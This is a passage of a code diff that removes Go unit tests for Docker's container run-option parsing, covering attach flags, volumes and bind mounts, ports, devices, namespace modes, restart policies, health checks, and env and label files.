-	if _, hostConfig := mustParse(t, ""); len(hostConfig.Links) != 0 {
-		t.Fatalf("Error parsing links. No link expected, received: %v", hostConfig.Links)
-	}
-}
-
-func TestParseRunAttach(t *testing.T) {
-	if config, _ := mustParse(t, "-a stdin"); !config.AttachStdin || config.AttachStdout || config.AttachStderr {
-		t.Fatalf("Error parsing attach flags. Expect only Stdin enabled. Received: in: %v, out: %v, err: %v", config.AttachStdin, config.AttachStdout, config.AttachStderr)
-	}
-	if config, _ := mustParse(t, "-a stdin -a stdout"); !config.AttachStdin || !config.AttachStdout || config.AttachStderr {
-		t.Fatalf("Error parsing attach flags. Expect only Stdin and Stdout enabled. Received: in: %v, out: %v, err: %v", config.AttachStdin, config.AttachStdout, config.AttachStderr)
-	}
-	if config, _ := mustParse(t, "-a stdin -a stdout -a stderr"); !config.AttachStdin || !config.AttachStdout || !config.AttachStderr {
-		t.Fatalf("Error parsing attach flags. Expect all attach enabled. Received: in: %v, out: %v, err: %v", config.AttachStdin, config.AttachStdout, config.AttachStderr)
-	}
-	if config, _ := mustParse(t, ""); config.AttachStdin || !config.AttachStdout || !config.AttachStderr {
-		t.Fatalf("Error parsing attach flags. Expect Stdin disabled. Received: in: %v, out: %v, err: %v", config.AttachStdin, config.AttachStdout, config.AttachStderr)
-	}
-	if config, _ := mustParse(t, "-i"); !config.AttachStdin || !config.AttachStdout || !config.AttachStderr {
-		t.Fatalf("Error parsing attach flags. Expect Stdin enabled. Received: in: %v, out: %v, err: %v", config.AttachStdin, config.AttachStdout, config.AttachStderr)
-	}
-
-	if _, _, err := parse(t, "-a"); err == nil {
-		t.Fatalf("Error parsing attach flags, `-a` should be an error but is not")
-	}
-	if _, _, err := parse(t, "-a invalid"); err == nil {
-		t.Fatalf("Error parsing attach flags, `-a invalid` should be an error but is not")
-	}
-	if _, _, err := parse(t, "-a invalid -a stdout"); err == nil {
-		t.Fatalf("Error parsing attach flags, `-a stdout -a invalid` should be an error but is not")
-	}
-	if _, _, err := parse(t, "-a stdout -a stderr -d"); err == nil {
-		t.Fatalf("Error parsing attach flags, `-a stdout -a stderr -d` should be an error but is not")
-	}
-	if _, _, err := parse(t, "-a stdin -d"); err == nil {
-		t.Fatalf("Error parsing attach flags, `-a stdin -d` should be an error but is not")
-	}
-	if _, _, err := parse(t, "-a stdout -d"); err == nil {
-		t.Fatalf("Error parsing attach flags, `-a stdout -d` should be an error but is not")
-	}
-	if _, _, err := parse(t, "-a stderr -d"); err == nil {
-		t.Fatalf("Error parsing attach flags, `-a stderr -d` should be an error but is not")
-	}
-	if _, _, err := parse(t, "-d --rm"); err == nil {
-		t.Fatalf("Error parsing attach flags, `-d --rm` should be an error but is not")
-	}
-}
-
-func TestParseRunVolumes(t *testing.T) {
-
-	// A single volume
-	arr, tryit := setupPlatformVolume([]string{`/tmp`}, []string{`c:\tmp`})
-	if config, hostConfig := mustParse(t, tryit); hostConfig.Binds != nil {
-		t.Fatalf("Error parsing volume flags, %q should not mount-bind anything. Received %v", tryit, hostConfig.Binds)
-	} else if _, exists := config.Volumes[arr[0]]; !exists {
-		t.Fatalf("Error parsing volume flags, %q is missing from volumes. Received %v", tryit, config.Volumes)
-	}
-
-	// Two volumes
-	arr, tryit = setupPlatformVolume([]string{`/tmp`, `/var`}, []string{`c:\tmp`, `c:\var`})
-	if config, hostConfig := mustParse(t, tryit); hostConfig.Binds != nil {
-		t.Fatalf("Error parsing volume flags, %q should not mount-bind anything. Received %v", tryit, hostConfig.Binds)
-	} else if _, exists := config.Volumes[arr[0]]; !exists {
-		t.Fatalf("Error parsing volume flags, %s is missing from volumes. Received %v", arr[0], config.Volumes)
-	} else if _, exists := config.Volumes[arr[1]]; !exists {
-		t.Fatalf("Error parsing volume flags, %s is missing from volumes. Received %v", arr[1], config.Volumes)
-	}
-
-	// A single bind-mount
-	arr, tryit = setupPlatformVolume([]string{`/hostTmp:/containerTmp`}, []string{os.Getenv("TEMP") + `:c:\containerTmp`})
-	if config, hostConfig := mustParse(t, tryit); hostConfig.Binds == nil || hostConfig.Binds[0] != arr[0] {
-		t.Fatalf("Error parsing volume flags, %q should mount-bind the path before the colon into the path after the colon. Received %v %v", arr[0], hostConfig.Binds, config.Volumes)
-	}
-
-	// Two bind-mounts.
-	arr, tryit = setupPlatformVolume([]string{`/hostTmp:/containerTmp`, `/hostVar:/containerVar`}, []string{os.Getenv("ProgramData") + `:c:\ContainerPD`, os.Getenv("TEMP") + `:c:\containerTmp`})
-	if _, hostConfig := mustParse(t, tryit); hostConfig.Binds == nil || compareRandomizedStrings(hostConfig.Binds[0], hostConfig.Binds[1], arr[0], arr[1]) != nil {
-		t.Fatalf("Error parsing volume flags, `%s and %s` did not mount-bind correctly. Received %v", arr[0], arr[1], hostConfig.Binds)
-	}
-
-	// Two bind-mounts, first read-only, second read-write.
-	// TODO Windows: The Windows version uses read-write as that's the only mode it supports. Can change this post TP4
-	arr, tryit = setupPlatformVolume([]string{`/hostTmp:/containerTmp:ro`, `/hostVar:/containerVar:rw`}, []string{os.Getenv("TEMP") + `:c:\containerTmp:rw`, os.Getenv("ProgramData") + `:c:\ContainerPD:rw`})
-	if _, hostConfig := mustParse(t, tryit); hostConfig.Binds == nil || compareRandomizedStrings(hostConfig.Binds[0], hostConfig.Binds[1], arr[0], arr[1]) != nil {
-		t.Fatalf("Error parsing volume flags, `%s and %s` did not mount-bind correctly. Received %v", arr[0], arr[1], hostConfig.Binds)
-	}
-
-	// Similar to previous test but with alternate modes which are only supported by Linux
-	if runtime.GOOS != "windows" {
-		arr, tryit = setupPlatformVolume([]string{`/hostTmp:/containerTmp:ro,Z`, `/hostVar:/containerVar:rw,Z`}, []string{})
-		if _, hostConfig := mustParse(t, tryit); hostConfig.Binds == nil || compareRandomizedStrings(hostConfig.Binds[0], hostConfig.Binds[1], arr[0], arr[1]) != nil {
-			t.Fatalf("Error parsing volume flags, `%s and %s` did not mount-bind correctly. Received %v", arr[0], arr[1], hostConfig.Binds)
-		}
-
-		arr, tryit = setupPlatformVolume([]string{`/hostTmp:/containerTmp:Z`, `/hostVar:/containerVar:z`}, []string{})
-		if _, hostConfig := mustParse(t, tryit); hostConfig.Binds == nil || compareRandomizedStrings(hostConfig.Binds[0], hostConfig.Binds[1], arr[0], arr[1]) != nil {
-			t.Fatalf("Error parsing volume flags, `%s and %s` did not mount-bind correctly. Received %v", arr[0], arr[1], hostConfig.Binds)
-		}
-	}
-
-	// One bind mount and one volume
-	arr, tryit = setupPlatformVolume([]string{`/hostTmp:/containerTmp`, `/containerVar`}, []string{os.Getenv("TEMP") + `:c:\containerTmp`, `c:\containerTmp`})
-	if config, hostConfig := mustParse(t, tryit); hostConfig.Binds == nil || len(hostConfig.Binds) > 1 || hostConfig.Binds[0] != arr[0] {
-		t.Fatalf("Error parsing volume flags, %s and %s should only one and only one bind mount %s. Received %s", arr[0], arr[1], arr[0], hostConfig.Binds)
-	} else if _, exists := config.Volumes[arr[1]]; !exists {
-		t.Fatalf("Error parsing volume flags %s and %s. %s is missing from volumes. Received %v", arr[0], arr[1], arr[1], config.Volumes)
-	}
-
-	// Root to non-c: drive letter (Windows specific)
-	if runtime.GOOS == "windows" {
-		arr, tryit = setupPlatformVolume([]string{}, []string{os.Getenv("SystemDrive") + `\:d:`})
-		if config, hostConfig := mustParse(t, tryit); hostConfig.Binds == nil || len(hostConfig.Binds) > 1 || hostConfig.Binds[0] != arr[0] || len(config.Volumes) != 0 {
-			t.Fatalf("Error parsing %s. Should have a single bind mount and no volumes", arr[0])
-		}
-	}
-
-}
-
-// This tests the cases for binds which are generated through
-// DecodeContainerConfig rather than Parse()
-func TestDecodeContainerConfigVolumes(t *testing.T) {
-
-	// Root to root
-	bindsOrVols, _ := setupPlatformVolume([]string{`/:/`}, []string{os.Getenv("SystemDrive") + `\:c:\`})
-	if _, _, err := callDecodeContainerConfig(nil, bindsOrVols); err == nil {
-		t.Fatalf("binds %v should have failed", bindsOrVols)
-	}
-	if _, _, err := callDecodeContainerConfig(bindsOrVols, nil); err == nil {
-		t.Fatalf("volume %v should have failed", bindsOrVols)
-	}
-
-	// No destination path
-	bindsOrVols, _ = setupPlatformVolume([]string{`/tmp:`}, []string{os.Getenv("TEMP") + `\:`})
-	if _, _, err := callDecodeContainerConfig(nil, bindsOrVols); err == nil {
-		t.Fatalf("binds %v should have failed", bindsOrVols)
-	}
-	if _, _, err := callDecodeContainerConfig(bindsOrVols, nil); err == nil {
-		t.Fatalf("volume %v should have failed", bindsOrVols)
-	}
-
-	//	// No destination path or mode
-	bindsOrVols, _ = setupPlatformVolume([]string{`/tmp::`}, []string{os.Getenv("TEMP") + `\::`})
-	if _, _, err := callDecodeContainerConfig(nil, bindsOrVols); err == nil {
-		t.Fatalf("binds %v should have failed", bindsOrVols)
-	}
-	if _, _, err := callDecodeContainerConfig(bindsOrVols, nil); err == nil {
-		t.Fatalf("volume %v should have failed", bindsOrVols)
-	}
-
-	// A whole lot of nothing
-	bindsOrVols = []string{`:`}
-	if _, _, err := callDecodeContainerConfig(nil, bindsOrVols); err == nil {
-		t.Fatalf("binds %v should have failed", bindsOrVols)
-	}
-	if _, _, err := callDecodeContainerConfig(bindsOrVols, nil); err == nil {
-		t.Fatalf("volume %v should have failed", bindsOrVols)
-	}
-
-	// A whole lot of nothing with no mode
-	bindsOrVols = []string{`::`}
-	if _, _, err := callDecodeContainerConfig(nil, bindsOrVols); err == nil {
-		t.Fatalf("binds %v should have failed", bindsOrVols)
-	}
-	if _, _, err := callDecodeContainerConfig(bindsOrVols, nil); err == nil {
-		t.Fatalf("volume %v should have failed", bindsOrVols)
-	}
-
-	// Too much including an invalid mode
-	wTmp := os.Getenv("TEMP")
-	bindsOrVols, _ = setupPlatformVolume([]string{`/tmp:/tmp:/tmp:/tmp`}, []string{wTmp + ":" + wTmp + ":" + wTmp + ":" + wTmp})
-	if _, _, err := callDecodeContainerConfig(nil, bindsOrVols); err == nil {
-		t.Fatalf("binds %v should have failed", bindsOrVols)
-	}
-	if _, _, err := callDecodeContainerConfig(bindsOrVols, nil); err == nil {
-		t.Fatalf("volume %v should have failed", bindsOrVols)
-	}
-
-	// Windows specific error tests
-	if runtime.GOOS == "windows" {
-		// Volume which does not include a drive letter
-		bindsOrVols = []string{`\tmp`}
-		if _, _, err := callDecodeContainerConfig(nil, bindsOrVols); err == nil {
-			t.Fatalf("binds %v should have failed", bindsOrVols)
-		}
-		if _, _, err := callDecodeContainerConfig(bindsOrVols, nil); err == nil {
-			t.Fatalf("volume %v should have failed", bindsOrVols)
-		}
-
-		// Root to C-Drive
-		bindsOrVols = []string{os.Getenv("SystemDrive") + `\:c:`}
-		if _, _, err := callDecodeContainerConfig(nil, bindsOrVols); err == nil {
-			t.Fatalf("binds %v should have failed", bindsOrVols)
-		}
-		if _, _, err := callDecodeContainerConfig(bindsOrVols, nil); err == nil {
-			t.Fatalf("volume %v should have failed", bindsOrVols)
-		}
-
-		// Container path that does not include a drive letter
-		bindsOrVols = []string{`c:\windows:\somewhere`}
-		if _, _, err := callDecodeContainerConfig(nil, bindsOrVols); err == nil {
-			t.Fatalf("binds %v should have failed", bindsOrVols)
-		}
-		if _, _, err := callDecodeContainerConfig(bindsOrVols, nil); err == nil {
-			t.Fatalf("volume %v should have failed", bindsOrVols)
-		}
-	}
-
-	// Linux-specific error tests
-	if runtime.GOOS != "windows" {
-		// Just root
-		bindsOrVols = []string{`/`}
-		if _, _, err := callDecodeContainerConfig(nil, bindsOrVols); err == nil {
-			t.Fatalf("binds %v should have failed", bindsOrVols)
-		}
-		if _, _, err := callDecodeContainerConfig(bindsOrVols, nil); err == nil {
-			t.Fatalf("volume %v should have failed", bindsOrVols)
-		}
-
-		// A single volume that looks like a bind mount passed in Volumes.
-		// This should be handled as a bind mount, not a volume.
-		vols := []string{`/foo:/bar`}
-		if config, hostConfig, err := callDecodeContainerConfig(vols, nil); err != nil {
-			t.Fatal("Volume /foo:/bar should have succeeded as a volume name")
-		} else if hostConfig.Binds != nil {
-			t.Fatalf("Error parsing volume flags, /foo:/bar should not mount-bind anything. Received %v", hostConfig.Binds)
-		} else if _, exists := config.Volumes[vols[0]]; !exists {
-			t.Fatalf("Error parsing volume flags, /foo:/bar is missing from volumes. Received %v", config.Volumes)
-		}
-
-	}
-}
-
-// callDecodeContainerConfig is a utility function used by TestDecodeContainerConfigVolumes
-// to call DecodeContainerConfig. It effectively does what a client would
-// do when calling the daemon by constructing a JSON stream of a
-// ContainerConfigWrapper which is populated by the set of volume specs
-// passed into it. It returns a config and a hostconfig which can be
-// validated to ensure DecodeContainerConfig has manipulated the structures
-// correctly.
-func callDecodeContainerConfig(volumes []string, binds []string) (*container.Config, *container.HostConfig, error) {
-	var (
-		b   []byte
-		err error
-		c   *container.Config
-		h   *container.HostConfig
-	)
-	w := runconfig.ContainerConfigWrapper{
-		Config: &container.Config{
-			Volumes: map[string]struct{}{},
-		},
-		HostConfig: &container.HostConfig{
-			NetworkMode: "none",
-			Binds:       binds,
-		},
-	}
-	for _, v := range volumes {
-		w.Config.Volumes[v] = struct{}{}
-	}
-	if b, err = json.Marshal(w); err != nil {
-		return nil, nil, fmt.Errorf("Error on marshal %s", err.Error())
-	}
-	c, h, _, err = runconfig.DecodeContainerConfig(bytes.NewReader(b))
-	if err != nil {
-		return nil, nil, fmt.Errorf("Error parsing %s: %v", string(b), err)
-	}
-	if c == nil || h == nil {
-		return nil, nil, fmt.Errorf("Empty config or hostconfig")
-	}
-
-	return c, h, err
-}
-
-// check if (a == c && b == d) || (a == d && b == c)
-// because maps are randomized
-func compareRandomizedStrings(a, b, c, d string) error {
-	if a == c && b == d {
-		return nil
-	}
-	if a == d && b == c {
-		return nil
-	}
-	return fmt.Errorf("strings don't match")
-}
-
-// setupPlatformVolume takes two arrays of volume specs - a Unix style
-// spec and a Windows style spec. Depending on the platform being unit tested,
-// it returns one of them, along with a volume string that would be passed
-// on the docker CLI (eg -v /bar -v /foo).
-func setupPlatformVolume(u []string, w []string) ([]string, string) {
-	var a []string
-	if runtime.GOOS == "windows" {
-		a = w
-	} else {
-		a = u
-	}
-	s := ""
-	for _, v := range a {
-		s = s + "-v " + v + " "
-	}
-	return a, s
-}
-
-// Simple parse with MacAddress validation
-func TestParseWithMacAddress(t *testing.T) {
-	invalidMacAddress := "--mac-address=invalidMacAddress"
-	validMacAddress := "--mac-address=92:d0:c6:0a:29:33"
-	if _, _, _, err := parseRun([]string{invalidMacAddress, "img", "cmd"}); err != nil && err.Error() != "invalidMacAddress is not a valid mac address" {
-		t.Fatalf("Expected an error with %v mac-address, got %v", invalidMacAddress, err)
-	}
-	if config, _ := mustParse(t, validMacAddress); config.MacAddress != "92:d0:c6:0a:29:33" {
-		t.Fatalf("Expected the config to have '92:d0:c6:0a:29:33' as MacAddress, got '%v'", config.MacAddress)
-	}
-}
-
-func TestParseWithMemory(t *testing.T) {
-	invalidMemory := "--memory=invalid"
-	validMemory := "--memory=1G"
-	if _, _, _, err := parseRun([]string{invalidMemory, "img", "cmd"}); err != nil && err.Error() != "invalid size: 'invalid'" {
-		t.Fatalf("Expected an error with '%v' Memory, got '%v'", invalidMemory, err)
-	}
-	if _, hostconfig := mustParse(t, validMemory); hostconfig.Memory != 1073741824 {
-		t.Fatalf("Expected the config to have '1G' as Memory, got '%v'", hostconfig.Memory)
-	}
-}
-
-func TestParseWithMemorySwap(t *testing.T) {
-	invalidMemory := "--memory-swap=invalid"
-	validMemory := "--memory-swap=1G"
-	anotherValidMemory := "--memory-swap=-1"
-	if _, _, _, err := parseRun([]string{invalidMemory, "img", "cmd"}); err == nil || err.Error() != "invalid size: 'invalid'" {
-		t.Fatalf("Expected an error with '%v' MemorySwap, got '%v'", invalidMemory, err)
-	}
-	if _, hostconfig := mustParse(t, validMemory); hostconfig.MemorySwap != 1073741824 {
-		t.Fatalf("Expected the config to have '1073741824' as MemorySwap, got '%v'", hostconfig.MemorySwap)
-	}
-	if _, hostconfig := mustParse(t, anotherValidMemory); hostconfig.MemorySwap != -1 {
-		t.Fatalf("Expected the config to have '-1' as MemorySwap, got '%v'", hostconfig.MemorySwap)
-	}
-}
-
-func TestParseHostname(t *testing.T) {
-	validHostnames := map[string]string{
-		"hostname":    "hostname",
-		"host-name":   "host-name",
-		"hostname123": "hostname123",
-		"123hostname": "123hostname",
-		"hostname-of-63-bytes-long-should-be-valid-and-without-any-error": "hostname-of-63-bytes-long-should-be-valid-and-without-any-error",
-	}
-	hostnameWithDomain := "--hostname=hostname.domainname"
-	hostnameWithDomainTld := "--hostname=hostname.domainname.tld"
-	for hostname, expectedHostname := range validHostnames {
-		if config, _ := mustParse(t, fmt.Sprintf("--hostname=%s", hostname)); config.Hostname != expectedHostname {
-			t.Fatalf("Expected the config to have 'hostname' as hostname, got '%v'", config.Hostname)
-		}
-	}
-	if config, _ := mustParse(t, hostnameWithDomain); config.Hostname != "hostname.domainname" && config.Domainname != "" {
-		t.Fatalf("Expected the config to have 'hostname' as hostname.domainname, got '%v'", config.Hostname)
-	}
-	if config, _ := mustParse(t, hostnameWithDomainTld); config.Hostname != "hostname.domainname.tld" && config.Domainname != "" {
-		t.Fatalf("Expected the config to have 'hostname' as hostname.domainname.tld, got '%v'", config.Hostname)
-	}
-}
-
-func TestParseWithExpose(t *testing.T) {
-	invalids := map[string]string{
-		":":                   "invalid port format for --expose: :",
-		"8080:9090":           "invalid port format for --expose: 8080:9090",
-		"/tcp":                "invalid range format for --expose: /tcp, error: Empty string specified for ports.",
-		"/udp":                "invalid range format for --expose: /udp, error: Empty string specified for ports.",
-		"NaN/tcp":             `invalid range format for --expose: NaN/tcp, error: strconv.ParseUint: parsing "NaN": invalid syntax`,
-		"NaN-NaN/tcp":         `invalid range format for --expose: NaN-NaN/tcp, error: strconv.ParseUint: parsing "NaN": invalid syntax`,
-		"8080-NaN/tcp":        `invalid range format for --expose: 8080-NaN/tcp, error: strconv.ParseUint: parsing "NaN": invalid syntax`,
-		"1234567890-8080/tcp": `invalid range format for --expose: 1234567890-8080/tcp, error: strconv.ParseUint: parsing "1234567890": value out of range`,
-	}
-	valids := map[string][]nat.Port{
-		"8080/tcp":      {"8080/tcp"},
-		"8080/udp":      {"8080/udp"},
-		"8080/ncp":      {"8080/ncp"},
-		"8080-8080/udp": {"8080/udp"},
-		"8080-8082/tcp": {"8080/tcp", "8081/tcp", "8082/tcp"},
-	}
-	for expose, expectedError := range invalids {
-		if _, _, _, err := parseRun([]string{fmt.Sprintf("--expose=%v", expose), "img", "cmd"}); err == nil || err.Error() != expectedError {
-			t.Fatalf("Expected error '%v' with '--expose=%v', got '%v'", expectedError, expose, err)
-		}
-	}
-	for expose, exposedPorts := range valids {
-		config, _, _, err := parseRun([]string{fmt.Sprintf("--expose=%v", expose), "img", "cmd"})
-		if err != nil {
-			t.Fatal(err)
-		}
-		if len(config.ExposedPorts) != len(exposedPorts) {
-			t.Fatalf("Expected %v exposed port, got %v", len(exposedPorts), len(config.ExposedPorts))
-		}
-		for _, port := range exposedPorts {
-			if _, ok := config.ExposedPorts[port]; !ok {
-				t.Fatalf("Expected %v, got %v", exposedPorts, config.ExposedPorts)
-			}
-		}
-	}
-	// Merge with actual published port
-	config, _, _, err := parseRun([]string{"--publish=80", "--expose=80-81/tcp", "img", "cmd"})
-	if err != nil {
-		t.Fatal(err)
-	}
-	if len(config.ExposedPorts) != 2 {
-		t.Fatalf("Expected 2 exposed ports, got %v", config.ExposedPorts)
-	}
-	ports := []nat.Port{"80/tcp", "81/tcp"}
-	for _, port := range ports {
-		if _, ok := config.ExposedPorts[port]; !ok {
-			t.Fatalf("Expected %v, got %v", ports, config.ExposedPorts)
-		}
-	}
-}
-
-func TestParseDevice(t *testing.T) {
-	valids := map[string]container.DeviceMapping{
-		"/dev/snd": {
-			PathOnHost:        "/dev/snd",
-			PathInContainer:   "/dev/snd",
-			CgroupPermissions: "rwm",
-		},
-		"/dev/snd:rw": {
-			PathOnHost:        "/dev/snd",
-			PathInContainer:   "/dev/snd",
-			CgroupPermissions: "rw",
-		},
-		"/dev/snd:/something": {
-			PathOnHost:        "/dev/snd",
-			PathInContainer:   "/something",
-			CgroupPermissions: "rwm",
-		},
-		"/dev/snd:/something:rw": {
-			PathOnHost:        "/dev/snd",
-			PathInContainer:   "/something",
-			CgroupPermissions: "rw",
-		},
-	}
-	for device, deviceMapping := range valids {
-		_, hostconfig, _, err := parseRun([]string{fmt.Sprintf("--device=%v", device), "img", "cmd"})
-		if err != nil {
-			t.Fatal(err)
-		}
-		if len(hostconfig.Devices) != 1 {
-			t.Fatalf("Expected 1 devices, got %v", hostconfig.Devices)
-		}
-		if hostconfig.Devices[0] != deviceMapping {
-			t.Fatalf("Expected %v, got %v", deviceMapping, hostconfig.Devices)
-		}
-	}
-
-}
-
-func TestParseModes(t *testing.T) {
-	// ipc ko
-	if _, _, _, err := parseRun([]string{"--ipc=container:", "img", "cmd"}); err == nil || err.Error() != "--ipc: invalid IPC mode" {
-		t.Fatalf("Expected an error with message '--ipc: invalid IPC mode', got %v", err)
-	}
-	// ipc ok
-	_, hostconfig, _, err := parseRun([]string{"--ipc=host", "img", "cmd"})
-	if err != nil {
-		t.Fatal(err)
-	}
-	if !hostconfig.IpcMode.Valid() {
-		t.Fatalf("Expected a valid IpcMode, got %v", hostconfig.IpcMode)
-	}
-	// pid ko
-	if _, _, _, err := parseRun([]string{"--pid=container:", "img", "cmd"}); err == nil || err.Error() != "--pid: invalid PID mode" {
-		t.Fatalf("Expected an error with message '--pid: invalid PID mode', got %v", err)
-	}
-	// pid ok
-	_, hostconfig, _, err = parseRun([]string{"--pid=host", "img", "cmd"})
-	if err != nil {
-		t.Fatal(err)
-	}
-	if !hostconfig.PidMode.Valid() {
-		t.Fatalf("Expected a valid PidMode, got %v", hostconfig.PidMode)
-	}
-	// uts ko
-	if _, _, _, err := parseRun([]string{"--uts=container:", "img", "cmd"}); err == nil || err.Error() != "--uts: invalid UTS mode" {
-		t.Fatalf("Expected an error with message '--uts: invalid UTS mode', got %v", err)
-	}
-	// uts ok
-	_, hostconfig, _, err = parseRun([]string{"--uts=host", "img", "cmd"})
-	if err != nil {
-		t.Fatal(err)
-	}
-	if !hostconfig.UTSMode.Valid() {
-		t.Fatalf("Expected a valid UTSMode, got %v", hostconfig.UTSMode)
-	}
-	// shm-size ko
-	if _, _, _, err = parseRun([]string{"--shm-size=a128m", "img", "cmd"}); err == nil || err.Error() != "invalid size: 'a128m'" {
-		t.Fatalf("Expected an error with message 'invalid size: a128m', got %v", err)
-	}
-	// shm-size ok
-	_, hostconfig, _, err = parseRun([]string{"--shm-size=128m", "img", "cmd"})
-	if err != nil {
-		t.Fatal(err)
-	}
-	if hostconfig.ShmSize != 134217728 {
-		t.Fatalf("Expected a valid ShmSize, got %d", hostconfig.ShmSize)
-	}
-}
-
-func TestParseRestartPolicy(t *testing.T) {
-	invalids := map[string]string{
-		"always:2:3":         "invalid restart policy format",
-		"on-failure:invalid": "maximum retry count must be an integer",
-	}
-	valids := map[string]container.RestartPolicy{
-		"": {},
-		"always": {
-			Name:              "always",
-			MaximumRetryCount: 0,
-		},
-		"on-failure:1": {
-			Name:              "on-failure",
-			MaximumRetryCount: 1,
-		},
-	}
-	for restart, expectedError := range invalids {
-		if _, _, _, err := parseRun([]string{fmt.Sprintf("--restart=%s", restart), "img", "cmd"}); err == nil || err.Error() != expectedError {
-			t.Fatalf("Expected an error with message '%v' for %v, got %v", expectedError, restart, err)
-		}
-	}
-	for restart, expected := range valids {
-		_, hostconfig, _, err := parseRun([]string{fmt.Sprintf("--restart=%v", restart), "img", "cmd"})
-		if err != nil {
-			t.Fatal(err)
-		}
-		if hostconfig.RestartPolicy != expected {
-			t.Fatalf("Expected %v, got %v", expected, hostconfig.RestartPolicy)
-		}
-	}
-}
-
-func TestParseHealth(t *testing.T) {
-	checkOk := func(args ...string) *container.HealthConfig {
-		config, _, _, err := parseRun(args)
-		if err != nil {
-			t.Fatalf("%#v: %v", args, err)
-		}
-		return config.Healthcheck
-	}
-	checkError := func(expected string, args ...string) {
-		config, _, _, err := parseRun(args)
-		if err == nil {
-			t.Fatalf("Expected error, but got %#v", config)
-		}
-		if err.Error() != expected {
-			t.Fatalf("Expected %#v, got %#v", expected, err)
-		}
-	}
-	health := checkOk("--no-healthcheck", "img", "cmd")
-	if health == nil || len(health.Test) != 1 || health.Test[0] != "NONE" {
-		t.Fatalf("--no-healthcheck failed: %#v", health)
-	}
-
-	health = checkOk("--health-cmd=/check.sh -q", "img", "cmd")
-	if len(health.Test) != 2 || health.Test[0] != "CMD-SHELL" || health.Test[1] != "/check.sh -q" {
-		t.Fatalf("--health-cmd: got %#v", health.Test)
-	}
-	if health.Timeout != 0 {
-		t.Fatalf("--health-cmd: timeout = %f", health.Timeout)
-	}
-
-	checkError("--no-healthcheck conflicts with --health-* options",
-		"--no-healthcheck", "--health-cmd=/check.sh -q", "img", "cmd")
-
-	health = checkOk("--health-timeout=2s", "--health-retries=3", "--health-interval=4.5s", "img", "cmd")
-	if health.Timeout != 2*time.Second || health.Retries != 3 || health.Interval != 4500*time.Millisecond {
-		t.Fatalf("--health-*: got %#v", health)
-	}
-}
-
-func TestParseLoggingOpts(t *testing.T) {
-	// logging opts ko
-	if _, _, _, err := parseRun([]string{"--log-driver=none", "--log-opt=anything", "img", "cmd"}); err == nil || err.Error() != "invalid logging opts for driver none" {
-		t.Fatalf("Expected an error with message 'invalid logging opts for driver none', got %v", err)
-	}
-	// logging opts ok
-	_, hostconfig, _, err := parseRun([]string{"--log-driver=syslog", "--log-opt=something", "img", "cmd"})
-	if err != nil {
-		t.Fatal(err)
-	}
-	if hostconfig.LogConfig.Type != "syslog" || len(hostconfig.LogConfig.Config) != 1 {
-		t.Fatalf("Expected a 'syslog' LogConfig with one config, got %v", hostconfig.RestartPolicy)
-	}
-}
-
-func TestParseEnvfileVariables(t *testing.T) {
-	e := "open nonexistent: no such file or directory"
-	if runtime.GOOS == "windows" {
-		e = "open nonexistent: The system cannot find the file specified."
-	}
-	// env ko
-	if _, _, _, err := parseRun([]string{"--env-file=nonexistent", "img", "cmd"}); err == nil || err.Error() != e {
-		t.Fatalf("Expected an error with message '%s', got %v", e, err)
-	}
-	// env ok
-	config, _, _, err := parseRun([]string{"--env-file=fixtures/valid.env", "img", "cmd"})
-	if err != nil {
-		t.Fatal(err)
-	}
-	if len(config.Env) != 1 || config.Env[0] != "ENV1=value1" {
-		t.Fatalf("Expected a config with [ENV1=value1], got %v", config.Env)
-	}
-	config, _, _, err = parseRun([]string{"--env-file=fixtures/valid.env", "--env=ENV2=value2", "img", "cmd"})
-	if err != nil {
-		t.Fatal(err)
-	}
-	if len(config.Env) != 2 || config.Env[0] != "ENV1=value1" || config.Env[1] != "ENV2=value2" {
-		t.Fatalf("Expected a config with [ENV1=value1 ENV2=value2], got %v", config.Env)
-	}
-}
-
-func TestParseEnvfileVariablesWithBOMUnicode(t *testing.T) {
-	// UTF8 with BOM
-	config, _, _, err := parseRun([]string{"--env-file=fixtures/utf8.env", "img", "cmd"})
-	if err != nil {
-		t.Fatal(err)
-	}
-	env := []string{"FOO=BAR", "HELLO=" + string([]byte{0xe6, 0x82, 0xa8, 0xe5, 0xa5, 0xbd}), "BAR=FOO"}
-	if len(config.Env) != len(env) {
-		t.Fatalf("Expected a config with %d env variables, got %v: %v", len(env), len(config.Env), config.Env)
-	}
-	for i, v := range env {
-		if config.Env[i] != v {
-			t.Fatalf("Expected a config with [%s], got %v", v, []byte(config.Env[i]))
-		}
-	}
-
-	// UTF16 with BOM
-	e := "contains invalid utf8 bytes at line"
-	if _, _, _, err := parseRun([]string{"--env-file=fixtures/utf16.env", "img", "cmd"}); err == nil || !strings.Contains(err.Error(), e) {
-		t.Fatalf("Expected an error with message '%s', got %v", e, err)
-	}
-	// UTF16BE with BOM
-	if _, _, _, err := parseRun([]string{"--env-file=fixtures/utf16be.env", "img", "cmd"}); err == nil || !strings.Contains(err.Error(), e) {
-		t.Fatalf("Expected an error with message '%s', got %v", e, err)
-	}
-}
-
-func TestParseLabelfileVariables(t *testing.T) {
-	e := "open nonexistent: no such file or directory"
-	if runtime.GOOS == "windows" {
-		e = "open nonexistent: The system cannot find the file specified."
-	}
-	// label ko
-	if _, _, _, err := parseRun([]string{"--label-file=nonexistent", "img", "cmd"}); err == nil || err.Error() != e {
-		t.Fatalf("Expected an error with message '%s', got %v", e, err)
-	}
-	// label ok
-	config, _, _, err := parseRun([]string{"--label-file=fixtures/valid.label", "img", "cmd"})
-	if err != nil {
-		t.Fatal(err)
-	}
-	if len(config.Labels) != 1 || config.Labels["LABEL1"] != "value1" {
-		t.Fatalf("Expected a config with [LABEL1:value1], got %v", config.Labels)
-	}
-	config, _, _, err = parseRun([]string{"--label-file=fixtures/valid.label", "--label=LABEL2=value2", "img", "cmd"})
-	if err != nil {
-		t.Fatal(err)
-	}
-	if len(config.Labels) != 2 || config.Labels["LABEL1"] != "value1" || config.Labels["LABEL2"] != "value2" {
-		t.Fatalf("Expected a config with [LABEL1:value1 LABEL2:value2], got %v", config.Labels)
-	}
-}
-
-func TestParseEntryPoint(t *testing.T) {
-	config, _, _, err := parseRun([]string{"--entrypoint=anything", "cmd", "img"})
-	if err != nil {
-		t.Fatal(err)
-	}
-	if len(config.Entrypoint) != 1 && config.Entrypoint[0] != "anything" {
-		t.Fatalf("Expected entrypoint 'anything', got %v", config.Entrypoint)
-	}
-}
-
-func TestValidateLink(t *testing.T) {
-	valid := []string{
-		"name",
-		"dcdfbe62ecd0:alias",
-		"7a67485460b7642516a4ad82ecefe7f57d0c4916f530561b71a50a3f9c4e33da",
-		"angry_torvalds:linus",
-	}
